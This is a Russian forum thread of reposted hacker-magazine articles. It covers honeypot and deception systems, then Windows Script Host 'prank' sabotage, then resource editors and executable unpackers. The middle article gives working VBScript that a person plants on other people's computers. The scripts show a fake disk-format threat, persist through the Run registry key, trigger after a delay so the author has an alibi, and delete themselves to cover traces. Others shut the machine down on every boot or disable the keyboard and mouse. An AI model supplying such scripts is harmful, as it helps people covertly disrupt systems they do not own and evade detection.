4 ERROR 0 0 0 500 Server Configuration Error - all.net closing connection

Как и любая другая нормальная система защита, DTK ведет свой собственный лог, в котором сохраняются все попытки проникновения. Например, вот как выглядит попытка утянуть файл паролей через Telnet-соединение:

127.0.0.1 23 23 1998/04/02 05:34:23 8041 8041:1 listen.pl S0

- - - +3 - - 8041:1 - S1 root

- - - +1 - - 8041:1 - S2 toor

- - - +2 - - 8041:1 - S3 ls

- - - +2 - - 8041:1 - S3 df

- - - +4 - - 8041:1 - S3 cat /etc/passwd

- - - +0 - - 8041:1 - S4 NOTICE //dtk/notify.pl 23 4 Email fc@all.net Just sent a password file to an attacker - telnet login

Необходимо заметить, что DTK - это абсолютно бесплатный продукт, который можно скачать по адресу: http://all.net/dtk/dtk.tar. Развивая пакет DTK, автор разработал улучшенную, но не бесплатную версию - DTK-Pro, которая, реализуя все возможности DTK, дополняет его новыми механизмами:

* Централизованное управление несколькими DTK, установленными на разных узлах сети.

* Графический интерфейс администратора DTK-Pro.

* Проверка согласованности задаваемых обманных правил.


На базе Perl построены и другие, более простые обманные системы. Например, WinDog Deception Toolkit, которая в стандартной поставке позволяет эмулировать тот же Sendmail и Telnet. Данный пакет, в отличие от DTK, изначально разрабатывался для Windows и тестировался на совместимость с ActivePerl. Пример подмены сервиса Telnet (исключая коммуникационную часть) Unix SVR4 показан ниже:

#!/usr/bin/perl

use Socket;

$port=23;

$login="\n\rlogin:";

$password="password:";

$banner="\n\r\n\rUnix® System V Release 4.0 (brooder)\n\r";

$fail="login incorrect.\n\r";


#

#Здесь идет коммуникационная часть (работа с сокетами и т.д.)

($af,$port,$inetaddr)=unpack($sockaddr,$addr);

@inetaddr=unpack('C4',$inetaddr);

($i1,$i2,$i3,$i4)=@inetaddr;

$ipaddr="$i1.$i2.$i3.$i4";

print "connected from $ipaddr\n";

print NS $banner;

print NS $login;

while() {

print "attempt to log in as $_\n";

print NS "$password";

$ll= || last;

sleep 5;

print "tried password $ll. Login incorrect is given\n";

print NS $fail;

print NS $login;

}

print "$ipaddr disconnected\n";

close(NS);

CyberCop Sting

Система CyberCop Sting, разработанная в компании Network Associates (http://www.nai.com), в отличие от DTK или WinDog-DTK, эмулирует не отдельные порты или сервисы, а целые Ethernet-сегменты, состоящие из маршрутизаторов Cisco (правда, устаревшей версии IOS 11.2), серверов Windows NT 4.0 и даже Solaris 2.6. Все атаки на виртуальные хосты регистрируются, что позволяет своевременно начать расследование инцидента и отслеживание злоумышленника.

Само "жало" функционирует как обычный NT-сервис, который настраивается путем изменения конфигурационных файлов (фрагмент такого файла см. ниже) в обычном текстовом редакторе.

node Virtual_Cisco_host_1 {

node-type CISCO

next-hop core.e0

iface e0 {

address 200.0.0.193/255.255.255.0

}

iface e1 {

address 200.0.0.194/255.255.255.0

}

}

node Virtual_Solaris_host_1 {

node-type SOLARIS

next-hop core.e0

iface e0 {

address 200.0.0.200/255.255.255.0

}

}

node Virtual_NT_host_2 {

node-type NT

next-hop Virtual_Cisco_host_1.e1

iface e0 {

address 200.0.0.201/255.255.255.0

}

}

Sting можно настроить и таким образом, чтобы виртуальный узел ретранслировал получаемые пакеты на вполне реальный, но невидимый для злоумышленника адрес, который и отвечает на все несанкционированные запросы. Таким образом, несуществующий узел выступает в роли прослойки между реальным и атакующим узлом. Хорошо, если бы CyberCop Sting умел бы эмулировать не только несуществующие узлы, но и отдельные порты и сервисы на этих узлах, еще больше затрудняя работу хакера. Но пока это не реализовано и неизвестно, дойдут ли до этого когда-нибудь у разработчиков руки.

RealSecure Server Sensor

Этот продукт трудно назвать обманной системой, т.к. Decoy-режим, реализованный в Server Sensor, является лишь небольшой частью тех возможностей, которые заложили в него разработчики. Кстати, разработана эта система компанией Internet Security Systems, которая известна своими сканерами Internet Scanner, System Scanner и Database Scanner и системой обнаружения атак на уровне сети RealSecure Network Sensor, которые уже упоминались на страницах ][. Еще мне понравилось то, что эта система, единственная из многих, поддерживается в России
(www.infosec.ru/ produkt/adapt/real_secure/real_sec.html). Да еще и обучение по ней можно пройти в России с выдачей соответствующей бумажки, признаваемой во всем мире. Пустячок, а приятно.

В отличие от уже названных систем, RealSecure Server Sensor функционирует как сервис (или демон) на Windows NT, Windows 2000, Linux, Solaris, HP UX и AIX и управляется централизованно с одной консоли (NT или W2k). Соответственно и настройка обманного режима (см. рисунок) осуществляется не из командной строки, а при помощи графического интерфейса.


Как видно из рисунка, в системе уже предопределен ряд сервисов, которые могут эмулироваться. Но и создать новые правила для любого из 65535 возможных сервисов не составляет большого труда. Для каждого из созданных правил возможно использование любого из вариантов реагирования, начиная от регистрации в базе данных и уведомления админа по e-mail или через SNMP и заканчивая созданием своих баннеров и обработчиков событий.

Заключение

Итак, для чего тебе может понадобиться любая из обманных систем, описанных в этой статье:

* для увеличения числа выполняемых нарушителем операций и действий;

* для получения возможности отследить нападающих.

Применение обманных систем - это достаточно интересный и, при правильном применении, эффективный метод обеспечения сетевой безопасности не только целых сетей, но и обычных домашних компьютеров. Однако для большей эффективности можно порекомендовать использовать связку защитных средств "обманная система - система обнаружения атак", которая позволит не только обнаружить нападающего сразу же после первой попытки атаки, но и заманить его при помощи обманной системы, тем самым давая время на обнаружение злоумышленника и принятие соответствующих мер.

Но не стоит забывать, что обманные системы - это не панацея от всех бед. Они помогают в случае простых нападений, осуществляемых начинающими или неопытными злоумышленниками (script kiddies). В случае квалифицированных и опытных нарушителей обманные системы теряют свою эффективность. Предварительный анализ трафика позволяет злоумышленнику понять, какие из обнаруженных портов фиктивные. Моделирование атак на стенде и сравнивание результатов с тем, что выдается в реальной атакуемой системе, также позволяет обнаружить использование обманных средств. Мало того, неправильная конфигурация обманной системы приведет к тому, что злоумышленник сможет обнаружить факт слежки за ним и прекратит свою несанкционированную деятельность. Однако число действительно квалифицированных злоумышленников не так велико, и поэтому использование обманных средств может помочь в большинстве случаев.






--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 19 2006, 16:06
Сообщение #89


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



WSH - лучшее средство компьютерного западлостроителя




Как только я не изгалялся тогда над несчастными, но злобными информатичками, тупорогими админами в компьютерных клубах, ламернутыми друганами и т.д. В этом отношении мне больше всего нравилась «Панель управления», с ее помощью можно быстро и легко совершить мерзкое компьютерное западло, например, поменять клавиши мыши местами (Панель управления -> Мышь), для чего достаточно установить переключатель конфигурации кнопок «Для левши» и/или отключить двойное нажатие, для этого нужно просто передвинуть бегунок скорости двойного нажатия в положение Выше. А можно отключить (почти!) клавиатуру (Панель управления -> Специальные возможности), для этого установи флажок напротив слово «Фильтрация» и нажми рядом кнопку «Настройка...», далее сними все флажки, которые там увидишь, а переключатель установи в положение «Игнорировать краткие нажатия», «замедлить повтор» и снова нажми «Настройка...», там воткни переключатель на «Нет повторов при удержании клавиш», а рычажок «Удержание нажатой клавиши для приема ввода» - в положение «Долгое», затем закрой все окна кнопками ОК, не забудь нажать «Применить». Вообще-то, после этого клавиатура будет работать, но придется по полчаса ждать срабатывания клавиш. А теперь представь, как весело будет работаться на компьютере, если проделать все вышесказанное smile.gif. И это далеко не все приколы «Панели управления», а ведь есть еще немало забавных системных файлов: system.ini, win.ini, msdos.sys, autoexec.bat, config.sys, реестр наконец, - туда я тоже любил запускать свои шаловливые ручонки. И я уж совсем молчу о банальном перемещении, переименовании, удалении файлов. Но во всем этом я быстро разочаровался, т.к. после такого западла трудно было избежать вражеского преследования.


Начинаю думать головой

Как правило, после моего ухода начинались паника и крики, типа: «Кто сидел за этим компьютером и весь его высидел?!!». Меня вычисляли, били по шее, пинали в поддых и в пах, после чего приходилось все восстанавливать sad.gif. Как ты понимаешь, это не есть кул! В итоге я понял, что хватит ходить в гипсе smile.gif, а пора заняться хакерским западлом, т.е. таким, чтобы нельзя было определить, кто и, желательно, как его сделал. Но каким образом? Конечно, можно было бы использовать какую-нибудь заподлянскую программку типа «Месть 56», но таскать ее все время с собой в лом. А если, к тому же, вражеский комп не имеет ни дисковода, ни сидюка и ко всему прочему не подключен к сети (бывает и такое)? Конечно, если на таком компе будет установлен хотя бы один язык программирования, то задача упростится - можно написать заподлянскую программку прямо на самом компьютере жертвы. А если нет? Вообще-то, есть еще возможность воспользоваться VBA из MS Office, но часто бывает, что и Офис не установлен (особенно это касается компьютерных клубов). Короче говоря, понятно, что должна иметься возможность совершить хакерское западло во всех жизненных ситуациях. И тогда я снова обратился к Windows - нутром почувствовал, что не может Мокрософт не позаботиться о нашем брате западлостроителе. И оказался прав...

Знакомство с WSH

Обратил я внимание на краткие упоминания от самой M$ о неком Сервере сценариев Windows (Windows Scripting Host). Когда я копнул поглубже, то понял, что вот он... вот он, предмет моих недолгих поисков! Суди сам:

- WSH стандартно входит в следующие операционки: Win 95OSR2/98/2k/Me/XP (к сожалению, в Win 95 и NT сервер сценариев отсутствует, но эти оси уже отживают свой век, а WSH активно развивается и стопроцентно будет использоваться во всех последующих Виндозах);

- WSH поддерживает языки сценариев VBScript и JScript, а также имеет возможность подключения любых других языков, например, таких, как Perl или Python (но для нас это не важно);

- WSH обладает практически неограниченными возможностями по работе с файлами, реестром, сетью и т.д.;

- для создания скриптов не требуется компиляторов и специальной среды программирования, достаточно простого текстового редактора, например, Блокнота (Notepad);

- для запуска сценариев требуется совсем немного памяти, а сами размеры сценариев могут быть практически любого размера (десятки тысяч строк).

Короче, теперь я откровенно заявляю, что не просто Windows, а именно WSH - лучшее средство компьютерного западлостроителя. И уверен, ты со мной согласишься.

Ладно, хватит тянуть пса за хвост - пора продемонстрировать тебе возможности этой рулезной фичи. Сразу скажу, что все примеры я буду приводить на VBScript в среде Windows 98 SE, т.к., на мой взгляд, VBS гораздо удобнее и имеет больше возможностей, чем JScript, а Win 98 - самая юзаемая до сих пор ось в мире (и что бы мне ни говорили!). Для тех, кто на самосвале, хочу заметить, что JScript - это совсем не JavaScript, а некая созданная Microsoft пародия на него. И еще - я не собираюсь давать тебе уроки WSH и VBS, т.к. в одной статье это просто невозможно, - моя задача заинтересовать тебя, продемонстрировать возможности, а изучить это дело ты сможешь и без меня, тем более что VBS учится практически на одном дыхании. Для начинающих хочу посоветовать на эту тему отличный сайт www.scripting.vlink.ru. Но можешь, конечно, и ничего не читать, а просто, как обезьяна с гранатой, использовать приведенные примеры.


Первый примерчик

Итак, начнем с простого, создадим загадочную мессагу, для этого откроем Блокнот (на компе жертвы smile.gif) и набьем следующее:

Hacker = MsgBox("Windows установила, что вы используете пиратскую версию системы. Windows обязана отформатировать жесткий диск. Да - произвести форматирование немедленно. Нет - сделать это перед окончанием работы системы.", 20, "System error")

Сохрани этот рулез с расширением .vbs в укромное местечко (например, в папку Windows\System) и дважды щелкни на значке полученного файла, ты должен увидеть следующее:

А теперь представь ламака, который увидит эту мессагу, как он дрожащей рукой нажмет кнопку Нет и как после этого будет сохранять все важные данные на дискеты. Весело! Одна только проблемка: «Как заставить жертву запустить этот файл?» Конечно, можно поместить наш файл в Автозагрузку (StartUp), но надежнее будет в реестр: Пуск -> Выполнить->regedit, раскрой ветвь HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, затем меню Правка (Edit) -> Создать (New) -> Строковой параметр (String Value) и введи StartUp Script. Дважды щелкни на новом параметре и введи путь к нашей мессаге (например, C:\Windows\System\message.vbs) и щелкни OK. Теперь наше западло будет выполняться для каждого юзера системы, и не всякое ламо сможет его обнаружить.

Конечно, это все замечательно, но после первой же перезагрузки компа мессага всплывет, и особо подозрительная жертва может почуять неладное. Поэтому сделаем так, чтобы западло давало о себе знать только, допустим, через 5 дней. Смотрим сегодняшнее число, например, это 19, и добавляем две строки, соответственно в начало и конец нашего скрипта:

if Day(now)>24 Then

....

End If

Теперь сообщение впервые появится только после двадцать четвертого числа. За это время жертва уже забудет о твоем приходе, и, стало быть, ты обеспечишь себе практически железное алиби.

Теперь логичным было бы добавить строки, которые, как и сказано в мессаге, отформатировали бы винт, но я против таких методов. Я придерживаюсь принципа, что в западле должна иметься возможность все вернуть в исходное состояние. Поэтому в нашем случае будет достаточно легкого испуга жертвы (но ты, конечно, можешь это исправить!). А сейчас сделаем так, чтобы наша прога заметала все свои следы, т.е. самоуничтожалась и вычищала о себе запись в реестре. Это необходимо обязательно сделать, иначе, после того как обещанного форматирования не произойдет, ламак заподозрит неладное и, если у него хватит таланта, может наткнуться на наш скрипт, а затем выйти и на нас. Короче, добавляем следующие строки для удаления нашего файла:

Set Killer=CreateObject("Scripting.FileSystemObject")

Killer.DeleteFile("c:\Windows\System\message.vbs")

и для удаления записи в реестре:

Set WSHShell=WScript.CreateObject("WScript.Shell")

WSHShell.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StartUp Script"

На скриншоте показано, как должен выглядеть готовый скрипт:

Теперь мессага появится один-единственный раз (после 24 числа) и исчезнет из системы навсегда - пусть ламо думает, что это глюканула винда или он сам smile.gif). Вот такое получилось простенькое, но нестандартное Хакерское западло.


Второй примерчик

Если тебе этого мало, то вот еще текст западла, отрубающего комп (также срабатывающего после 24 числа):

If Day(now)>24 Then

Sub Zapadlo(Fuck, Wait)

Set WshShell=WScript.CreateObject("WScript.Shell")

X=WshShell.Run(Fuck,Wait)

End Sub

Call Zapadlo("rundll32 shell32,SHExitWindowsEx -1", True)

End If

Помести это, как и в первом примере, в реестр, и сразу же после загрузки комп будет вырубаться smile.gif.

Наверное, ты заметил, что в кавычках инструкции Call указана одна из команд Windows 9x, которую можно просто ввести в поле Выполнить (Run). Если ты, например, поместишь в программу строку: Call Zapadlo("c:\windows\calc.exe", True), то будет запускаться калькулятор.

Для тех, кто «далек от мысли», привожу список еще некоторых интересных команд:

rundll32 keyboard,disable - отключить клавиатуру;

rundll32 mouse,disable - отключить мышь;

rundll32 user,swapmousebutton - поменять местами клавиши мыши;

rundll32 user,disableoemlayer - спровоцировать сбой (обрати внимание!);

rundll32 shell32,SHExitWindowsEx 0 - завершить работу текущего пользователя;

rundll32 krnl386.exe,exitkernel - выход из Windows без любых сообщений/вопросов;

rundll32 shell32,ShellAboutA Info-Box - показать окно About Windows.

Кстати, инструкций Call в последнем скрипте можно вставлять бесчисленное множество, поэтому, например, можешь одновременно отрубить мышь и клавиатуру - здесь все зависит от твоей фанты.


Кончаю

Ну все, хватит гонять - думаю, я тебя уже достаточно заинтересовал, пора бы и делом заняться wink.gif. Напоследок дам тебе совет: никогда не показывай потенциальной жертве, что ты отлично волокешь в компах, - строй из себя конченного ламера (как с недавних пор делаю я) - по пять минут ищи нужную кнопку на клаве, с третьей попытки попадай указателем мыши в ярлык и т. п. (не мне тебя учить). Тогда ты точно останешься живым и здоровым и не придется пришивать оторванные руки и прикручивать на место открученную голову smile.gif.

Удачи тебе в нелегком и экстремальном компьютерном западлостроительстве!

З.Ы. Блин, что я наделал... бедные учителя информатики...

Сообщение отредактировал Metallica - Dec 19 2006, 16:09


--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 23 2006, 18:29
Сообщение #90


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Руcификация своими руками

Хотелось бы тебе покопаться в интересной программе? Выяснить, как она выглядит изнутри, выдрать из нее красивые значки и картинки или вообще изменить ее внутренний интерфейс? Но для полноценной работы нужны исходники, нужно знать основы программирования... Вообще, нужно изучать очень много вещей, на которые совершенно нет времени. К тому же 80% разработчиков не подозревают о существовании «великого и могучего», а от английского интерфейса начинает тошнить... Есть довольно простой способ изменить если не принципы работы программы, но уж ее внешний вид точно.

Пролог

В феврале 2000 года из Х я узнал о существовании программы Restorator. Хотя нет, скачал я ее еще пару месяцев назад, но не врубился, что она делает. На сайте автора было написано про exciting world of UCA's - User-styled Custom Applications, но это ничего не объясняло. А маленький абзац в Х все прояснил - это программа для переделки других программ. На самом деле все довольно просто. В любой программе есть место, где в довольно упорядоченном виде хранятся почти все данные ее внешнего вида. И эти данные можно легко изменить, не обладая никакими основами программирования и не имея исходных кодов. Программы, которые могут изменять эти данные, относятся к классу редакторов ресурсов. За прошедшие полтора года этот класс довольно сильно разросся на волне популярности Restorator-а, появился даже один отечественный представитель.

Теория

Для начала немного теории, а потом я опишу известные мне редакторы ресурсов. Ресурсы чаще всего находятся в exe файлах, реже в dll, а вообще их можно найти везде - вплоть до файлов с экранными заставками (scr). Почти независимо от того, в чем сделана интересующая нас программа, они разделены по разным разделам/папкам. Все примеры я будут давать на базе программы Restorator, она обладает почти самым большим количеством возможностей и довольно проста в освоении.

Скачиваем, запускаем и видим три окна - «resource tree» - в нем показывается открытый файл со всем его ресурсами в виде раскрывающихся папок; внизу висит содержимое рабочей папки, куда будут извлекаться ресурсы и откуда они будут добавляться. Справа есть окно resource viewer, где будет отображаться содержимое открытого ресурса. В качестве примера возьмем всем известный блокнот, надеюсь, он у тебя есть. Открываем в рестораторе notepad.exe - и что мы видим? А видим мы несколько папок - Menu, Dialog, String, Accelerators, Icon, Version. Некоторым людям, всю жизнь не вылезающим из танка, эти названия ничего не говорят, но нам-то ясно, что в папке Menu находятся стандартные меню, в папке Dialog содержаться окна диалогов. В папке String находятся текстовые отрезки, вставляемые в разные места программы, в Accelerators находится список сочетаний кнопок, который проставляется в меню. Так, что там еще осталось? Папка Icon содержит значки, а Version - информацию о версии программы. Так как блокнот не слишком продвинутая программа, в ней отсутствуют разделы с картинками - Bitmap, с видео - AVI, с функциями - Typelib. В программах, написанных на Delphi, есть еще раздел RCData. Некоторые типы данных - Menu, Dialog, String, Accelerators и RCData - можно редактировать во встроенном редакторе. Почти все типы данных, кроме version, можно извлечь и редактировать в других программах. А потом вставить обратно. То есть можно изменить все картинки программы, все видеовставки. Например, в Windows вместо перелетающего листочка можно поставить летающий кирпич, если у тебя настолько прямые руки, что могут редактировать видео. Все видеофайлы хранятся в формате Avi, а картинки чаще всего в Bmp, 256 цветов. Курсоры, иконки - все можно заменить. Нельзя изменить только информацию о версии программы, которая содержится в разделе Version. По мнению автора программы - изменение данных о версии может внести путаницу. Во время редактирования меню и диалогов все изменения автоматически будут отображаться в окне предварительного просмотра, что существенно облегчает задачу. Внизу каждого изменяемого файла будет несколько закомментированных строк. В нем довольно подробно, но по-английски, будет написано, что можно сделать с данным кодом. Теоретически, осмыслив эти комментарии, можно разобраться во всем, не читая данную статью.

Проблемы

Любое дело, кроме самого примитивного, содержит большую кучу проблем. И здесь нас не минует сия чаша.

Проблема номер 1: Тип RCData содержит в себе одновременно и текст, и всю графику данного окна. С ним неудобно работать, серия Виндов 9х не может отобразить для редактирования очень большие куски текста. Попробуй, например, открыть в блокноте файл размером в мегабайт. Облом, да? И встроенный редактор Restorator-а также обломает. Конечно, можно все это извлечь, получив кучу рисунков и один txt файл. Но не факт, что это все запихнется обратно. Самым лучшим выходом является переход на Win NT/2K/XP, если ты этого еще не сделал.

Проблема номер 2: Часто разработчики, наплодив громадных размеров исполняемый файл или озабоченные неприкосновенностью своего детища, сжимают его до совершенно непотребных размеров. Например, небезызвестный Winboost обладает exe файлом весом в 7 метров. После сжатия он уменьшается в 10 раз, вот только редактировать ресурсы в нем нельзя. При открытии таких файлов Restorator выдает надпись о поврежденных ресурсах. Эта проблема отчасти разрешима, причем в два этапа. Этап первый - находим программы для анализа файлов и выясняем, чем они сжаты. Этап второй - находим, чем файлы можно разжать, и разжимаем. Облом может наступить на любом этапе - или что-то не анализируется, или не разжимается, или разжатое не работает. Не работать может по двум причинам - либо сжимали по максимуму и ничего восстановить нельзя, либо разжатый файл поврежден. Тогда можно сделать такой финт ушами - загрузить в каком-нибудь редакторе ресурсов и сохранить. Очень помогает в таком случае Alchemy CATALYST.

Проблема номер 3: В исполняемом файле нет никаких ресурсов или там какая-то фигня. Где тогда искать? Можно открывать по очереди все самые большие файлы в папке с программой. Можно посмотреть, что во время установки программы устанавливалось в системные папки windows. Можно посмотреть, к каким файлам обращается программа во время запуска. Можно «програбить» всю папку с программой на наличие текстовых ресурсов, а потом поискать в результатах какую-нибудь сложную фразу из программы и выяснить, откуда она выдрана.

Проблема номер 4: Программа проверяет свою идентичность во время запуска. Тут надо искать кряк, который снимает эту защиту, или сделать его самому.

А как сразу получить результат?

Специально для тех, кто испугался всех трудностей и хочет получить результат, ни фига не делая. К счастью, в Рунете еще полно ненормальных, типа меня, которые готовы бесплатно поделиться результатами своих трудов. Допустим, позарез захотелось увидеть программу XXX на русском языке. Как можно изменить ее интерфейс? Вариантов целых три:

Если разработчики программы ХХХ умные предусмотрительные люди, они подозревают о наличии в мире других языков. Они делают в своей программе возможность смены языков. Чаще всего все данные о новом языке интерфейса содержатся в специальном файле, который я называю «языковой модуль». Надо разыскать в сети такой файл на нужном языке и подсунуть его программе. Чаще всего он подходит к разным версиям программы.

Если возможности легально изменить язык интерфейса нет, придется воспользоваться специальными патчами, которые заменят часть ресурсов программы на немного измененные. Название этих патчей - русификаторы. (К сожалению, у этого слова есть еще несколько значений, так что не запутайтесь.)

Третий вариант экзотический, для настоящих извращенцев. В мире существует уникальная программа, которая может «на лету» заменять английский интерфейс на русский. Называется это убожество LingoWare. Работает оно по словарю, который существует пока только для одной программы - ICQ. Это настоящий монстр. Требует денег, обладает жутким интерфейсом с поддержкой скинов, отжирает кучу памяти и заметно тормозит работу компьютера.

Вооружаемся

Теперь, когда все ламеры, испуганные теорией и проблемами, сбежали, начинаем вооружаться. Первым делом идут программы для изменения ресурсов.

Restorator. Самая известная программа. Обладает довольно понятным интерфейсом. Довольно подробное описание работы, справка и комментарии. Очень много интересной информации есть на сайте. Может "грабить" файлы и папки на наличие ресурсов. Зарегистрированная версия может создавать патчи, то есть автономные программы, которые будут вносить все изменения в ресурсы, которые ты сделал. Может отобразить почти все виды ресурсов. Из недостатков - небольшая глючность. Иногда виснет. Иногда отрубаются сочетания кнопок. Не идеальный поиск (в результате указывается только ресурс, содержащий результат). Медленно выходят новые версии. Нет визуального редактирования диалогов. Небольшой прикольный баг: предыдущая версия (2.50) могла зарегистрироваться без ввода регистрационного кода.

Resource Hacker. Очень неплохая программа. Идеально дополняет ресторатор. Быстрая. Интерфейс простой. Нормальный поиск. Может редактировать HEX.
Passolo. Для оперирования с файлами использует проекты, где записано, какие файлы, ресурсы и установки использовать с данной программой. Можно создавать словари с переводами слов, которые будут подставляться автоматически. Перед редактированием создается список текстовых фраз, который потом надо изменять. Но обычный тип, через дерево ресурсов все же есть.

Visual Localize. Программа похожа на Passolo, только более неудобный, но оригинальный интерфейс. Тоже используются проекты, тоже есть словари, так же создается список текстовых надписей. Большим плюсом является мощная система замены по шаблону и навороченная система просмотра. Без регистрации не дает изменять весь файл.

Alchemy CATALYST. Довольно продвинутая программа. Визуальный редактор. Подсчет букв в изменяемом сочетании. Редактирование ведется в двойном окне, где сразу показывается измененный вариант и оригинал. Без регистрации дает изменить только 10% от файла.

Resource Tuner. Обладает интерфейсом в стиле XP и прикольной текстовой строкой. Подключаются плагины. Без регистрации работает 30 дней.

ExeScope. Раньше это была довольно неплохая программа, но всеми ее достоинствами обладает Resource Hacker, а глюков у нее куча.

Есть еще старые и малоэффективные программы от крупных фирм. Например, Resource Workshop от Borland и ResourceStudio от Symantec.

Программы для анализа сжатых файлов. Так как это программы из арсенала хакеров, найти их в сети иногда довольно сложно. Почти все они заброшены довольно давно и не обновляются.

PE-Sniffer. Единственная Win программа. Анализирует файлы на наличие признаков самых распространенных программ для сжатия/защиты. Может определить компилятор.

File Analyzer, File Information, File Scanner. Все они работают из-под DOS. Выводят кучу информации, среди которой может быть то, что нам нужно.

Программы для разжатия. Если ты определил, чем была сжата нужная вам программа, следует воспользоваться программой для разжатия именно этой версии этого сжимальщика. Лучше подобрать коллекцию побольше, на всякий случай.

ProcDump - Самая известная и глобальная программа. Анализатор и распаковщик, поддерживает кучу форматов, может пересобрать исполняемый файл. Единственная программа, у которой есть win интерфейс.

UN-PACK - анализатор и распаковщик. Поддерживает плагины. В качестве плагинов использует File Analyzer, EXESCAN, DISASM, IDArc.

UnASPack - для ASPack, Ashell.

CASPR - для ASPack и ASProtect.

DeShrink - для Shrinker.

rAD - для r!sc's Asprotect.

Теперь переходим к программам, помогающим в быту.

Aditor Pro. Многооконный текстовый редактор. Подсветка синтаксиса. Режим замены. Возможность поиска в файлах. Довольно быстро открывает большие текстовые файлы. Идеальный редактор для извлеченных ресурсов.

BK ReplaceEm. Программа для пакетного изменения текста в файлах. Вводите текст для поиска, текст для замены, указываете папку, и все ее содержимое меняется. Самое главное, что варианты поиска и замены можно сохранить. Таким образом, составив своеобразный словарь с самыми частыми словами, можно заменить половину извлеченных ресурсов.






--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
dron
сообщение Jan 8 2007, 19:31
Сообщение #91


Постоянный пользователь
****

Группа: Новички
Сообщений: 380
Регистрация: 2-June 06
Из: Южное Бутово
Пользователь №: 413
Заходит на форум с гостевика.



крутые статьи тока читать некода


--------------------
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение

5 страниц V « < 3 4 5
ОтветитьСоздать новую тему
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0

 

- Текстовая версия Сейчас: 1st March 2021 - 15:20
 
     
Rambler's Top100 службы мониторинга серверов
Gentoo Powered Lighttpd Powered